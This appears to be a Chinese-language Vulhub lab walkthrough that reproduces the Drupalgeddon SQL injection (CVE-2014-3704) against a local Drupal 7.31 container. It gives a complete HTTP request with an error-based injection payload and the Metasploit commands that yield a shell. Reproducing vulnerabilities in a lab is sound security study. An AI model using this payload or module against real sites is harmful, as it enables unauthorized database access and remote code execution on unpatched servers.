Vulhub之“Drupalgeddon” SQL注入漏洞(CVE-2014-3704)

簡介

Drupal 是一款用量龐大的CMS,其7.0~7.31版本中存在一處無需認證的SQL漏洞。通過該漏洞,攻擊者可以執行任意SQL語句,插入、修改管理員信息,甚至執行任意代碼。

 

 

漏洞環境

進入對應的路徑:  vulhub-master/drupal/CVE-2014-3704

執行如下命令啓動Drupal 7.31環境:

docker-compose up -d

環境啓動後,訪問http://ip:8080即可看到Drupal的安裝頁面,使用默認配置安裝即可。

其中,Mysql數據庫名填寫drupal,數據庫用戶名、密碼爲root,地址爲mysql

安裝成功之後,  訪問主頁:

 

 

漏洞復現

該漏洞無需認證,發送如下數據包即可執行惡意SQL語句:

POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

name[0 or updatexml(0,concat(0xa,database()),0)%23]=bob&name[0]=a&pass=bug&form_build_id=form-hUM-lGJvIc5NEmlo46nu_0Z7cOfyfmk6BQjvIRD4goA&form_id=user_login_block
&op=Log in

報錯注入成功。

 

 

msf工具利用

搜索drupal漏洞:

search drupal

 查看漏洞信息:

show info exploit/multi/http/drupal_drupageddon

使用CVE-2014-3704對應的攻擊模塊:

use exploit/multi/http/drupal_drupageddon

設置Drupal網站路徑:

set targeturi /

所定攻擊的ip和端口:

set RHOSTS 192.168.10.10

set rport 8080

發動攻擊,  拿到shell:

exploit

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章